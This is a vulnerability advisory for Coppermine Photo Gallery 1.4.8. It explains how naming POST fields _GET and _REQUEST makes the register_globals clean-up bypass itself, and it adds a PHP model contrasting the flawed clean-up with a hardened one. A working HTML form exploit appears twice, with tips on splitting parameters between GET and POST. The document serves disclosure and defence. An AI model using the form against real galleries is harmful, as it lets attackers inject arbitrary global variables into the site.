——————-Summary—————-
Software: CPG Coppermine Photo Gallery
Software's Web Site: http://coppermine.sourceforge.net/
Versions: 1.4.8.stable
Class: Remote
Status: Unpatched
Exploit: Available
Discovered by: imei addmimistrator
Risk Level: High
—————–Description—————
Coppermine Photo Gallery has a logic flaw in its anti-XSS / register_globals clean-up routine that allows the routine to be bypassed completely.
The clean-up walks the request arrays ($_GET, $_POST, $_REQUEST and so on) and, for every key it finds there, deletes the global variable of the same name. Because it deletes by name, a request parameter whose name is that of one of the predefined arrays, such as _GET or _REQUEST, makes the routine delete that array itself before it has been walked. Any global variable that register_globals has already created from that array is then never checked and never deleted, so the clean-up is bypassed.
Assume register_globals is on and request a URL with the following mixed GET and POST parameters:
<form method=post action="cpg/?MyVar=value">
<input name=_GET type=hidden>
<input name=_REQUEST type=hidden>
<input type=submit></form>
register_globals creates the global variable $MyVar with an arbitrary value before the script runs. When the clean-up then processes the POST keys _GET and _REQUEST, it deletes the predefined $_GET and $_REQUEST arrays; $MyVar can no longer be reached for checking and deletion, yet it still exists in the global scope.
If you also need to pass the program's normal parameters (for example a picture or page number), do not send them in the query string: put the injected variable in the GET array and the normal parameters in the POST array. Use each array for only one of these two purposes at a time.
Because of this bug an attacker can create arbitrary global variables that the rest of the source code will later act on.
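The following PHP model is an added example; it is not code from this advisory or from Coppermine's init.inc.php. Plain arrays stand in for PHP's global symbol table so the clean-up ordering described above can be traced without register_globals, and a clean-up that is not fooled is shown beside it. The function names, the constant SUPERGLOBALS and the order in which the request arrays are walked (POST, then GET, then REQUEST) are assumptions, not facts about Coppermine.

```php
<?php
// Added example: a model of the clean-up logic described in this advisory.
// It is not Coppermine's code. Plain arrays stand in for PHP's global symbol
// table; the walk order (POST, GET, REQUEST) is an assumption.

const SUPERGLOBALS = ['GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST',
                      '_SERVER', '_ENV', '_FILES', '_SESSION'];

// Model of register_globals: every request key becomes a global variable.
// The predefined arrays are not replaced by request data in this model; the
// bypass relies on the clean-up deleting them, not on overwriting them.
function registerGlobals(array $get, array $post): array
{
    $globals = [
        '_GET'     => $get,
        '_POST'    => $post,
        '_REQUEST' => array_merge($get, $post), // default "GP" order: POST wins
    ];
    foreach ([$get, $post] as $request) {
        foreach ($request as $name => $value) {
            if (!in_array($name, SUPERGLOBALS, true)) {
                $globals[$name] = $value;
            }
        }
    }
    return $globals;
}

// Flawed clean-up (the logic the advisory describes): for each request array,
// delete every global sharing a name with one of its keys. Because it deletes
// by name while still walking, a POST key called "_GET" removes $_GET itself
// before $_GET has been walked, and variables registered from the query
// string are never examined.
function flawedCleanup(array $globals): array
{
    foreach (['_POST', '_GET', '_REQUEST'] as $array) {
        if (!isset($globals[$array]) || !is_array($globals[$array])) {
            continue; // already deleted by an earlier iteration
        }
        foreach (array_keys($globals[$array]) as $name) {
            unset($globals[$name]);
        }
    }
    return $globals;
}

// Hardened clean-up: snapshot every request key first, refuse to delete a
// predefined array, then unset. The walk can no longer be disturbed by the
// names the attacker chooses.
function hardenedCleanup(array $globals): array
{
    $names = [];
    foreach (['_POST', '_GET', '_REQUEST'] as $array) {
        $names = array_merge($names, array_keys($globals[$array] ?? []));
    }
    foreach (array_unique($names) as $name) {
        if (!in_array($name, SUPERGLOBALS, true)) {
            unset($globals[$name]);
        }
    }
    return $globals;
}

// Constructed request matching the form in the advisory: the injected
// variable in the query string, the poisoning names in the POST body.
$get  = ['MyVar' => 'value'];
$post = ['_GET' => '', '_REQUEST' => '', 'pic' => '42'];

$globals = registerGlobals($get, $post);

$afterFlawed = flawedCleanup($globals);
printf("flawed:   MyVar %s, \$_GET %s\n",
    isset($afterFlawed['MyVar']) ? 'survives' : 'removed',
    isset($afterFlawed['_GET']) ? 'intact' : 'deleted');

$afterFixed = hardenedCleanup($globals);
printf("hardened: MyVar %s, \$_GET %s\n",
    isset($afterFixed['MyVar']) ? 'survives' : 'removed',
    isset($afterFixed['_GET']) ? 'intact' : 'deleted');
```

Run it with `php model.php`. In the flawed variant the POST keys _GET and _REQUEST delete those arrays before they are walked, so $MyVar is never seen; the hardened variant collects the key list before it unsets anything and skips the predefined array names, so $MyVar is removed and $_GET stays intact. The real fix for this class of bug is to run with register_globals off, which removes the need for any such clean-up.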
————–See Also——————
{include/init.inc.php} lines 40-101
/* not reproduced here because of its length */
————–Exploit———————-
<form method=post action="cpg/?MyVar=value">
<input name=_GET type=hidden>
<input name=_REQUEST type=hidden>
<input type=submit></form>
————–Conditions————–
register_globals must be ON
————–Credit———————–
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
imei(4}Kapda(O}IR
www.myimei.com
myimei.com/security